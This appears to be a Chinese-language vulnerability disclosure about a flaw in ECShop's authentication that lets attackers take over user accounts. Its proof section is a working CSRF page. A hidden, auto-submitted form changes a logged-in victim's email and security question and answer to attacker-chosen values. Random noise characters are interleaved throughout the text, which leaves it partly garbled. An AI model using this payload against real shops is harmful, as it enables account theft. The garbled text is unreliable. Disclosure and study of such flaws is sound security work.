简要描述:
; F5 {; K$ T+ Y4 J! a8 @& kecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 E2 V6 S% R1 f: M
1 \: |0 V3 o( p0 i9 x% H! p. r
Demo For:http://www.wooyun.org/bug.php?action=view&id=3954 v1 Q( O) E6 k4 |
+ l' P. v" W- z3 m7 _ v( D详细说明:
4 m* A- W$ [3 V) w/ N' S! |利用csrf和xss可以突破官方所说的“障碍”3 T* Z l; t" R* {% m$ F4 [* b
xss版本已经有人说明
, d6 R5 t1 l/ I+ \2 ^& }6 E这里给出csrf版本% w* }: t8 ^5 M- g
7 W* I5 c- [: O# R7 y. T
漏洞证明:
( P; f3 }: f" y$ D" H<html>2 B) P ?, `! Z! O3 P
<body>
$ a3 v7 o/ B5 I8 t3 P$ H% h% G<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
; s E- q( b9 x& B<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
$ L0 f* b3 V# Q3 }<INPUT TYPE="text" NAME="act" value="act_edit_profile">$ n! A$ X5 b# a, W/ f7 G
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
6 N, Z1 e: Z! A6 }<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
2 S! W0 h9 p! d$ Q7 w9 u: @</body>, G5 l# x3 }& t( \# v
<script>
/ u$ G8 K* a; `* W/ ~5 C" ~1 jdocument.forms[0].submit();: c. S" ?- k) w9 C2 T# A- M
</script>2 d3 A2 X+ L z/ {8 c5 @
</html>7 T* @! w3 y4 B9 ~* k
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
. K( w; F5 k2 c* m9 J$ l
0 U! B% ?3 Q) v$ X# c+ H* s |